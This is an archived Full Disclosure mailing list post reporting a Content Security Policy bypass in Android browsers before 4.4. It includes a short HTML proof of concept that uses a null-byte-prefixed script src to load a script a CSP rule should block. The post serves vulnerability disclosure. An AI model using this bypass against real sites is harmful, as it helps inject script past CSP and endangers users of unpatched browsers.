Full Disclosure mailing list archives

CSP Bypass on Android prior to 4.4

From: E Boogie <evanjjohns () gmail com>
Date: Sat, 11 Oct 2014 16:09:51 -0400

I've found a Content Security Policy bypass similar and related to the
same origin policy bypass in CVE-2014-6041.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

I've tested this on an Android 4.3 tablet running a bunch of different
browsers, including Inbrowser, Firefox, and the default Android
browser on an emulator for Android 4.3.1.

HTML PoC:

<input type=button value="test" onclick="
  a=document.createElement('script');
  a.id='AA';
  a.src='\u0000https://js.stripe.com/v2/&apos;;
  document.body.appendChild(a);
  setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{
alert(2);}}, 400);
  return false;">


The content security policy rule that should block this is
script-src 'self' https://js.stripe.com/v3/ ;

The PoC worked if you see a popup containing stripes e(){} object. I
set the Timeout kind of short, so you may have to press the button
twice before you see the popup.

I have a PoC test page at ejj.io/test.php

Cheers,
Evan J

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

CSP Bypass on Android prior to 4.4 E Boogie (Oct 11)
- Re: CSP Bypass on Android prior to 4.4 E Boogie (Oct 13)
  - Re: CSP Bypass on Android prior to 4.4 E Boogie (Oct 13)
  - Message not available
    - Fwd: Re: CSP Bypass on Android prior to 4.4 Vitor Ventura (Oct 14)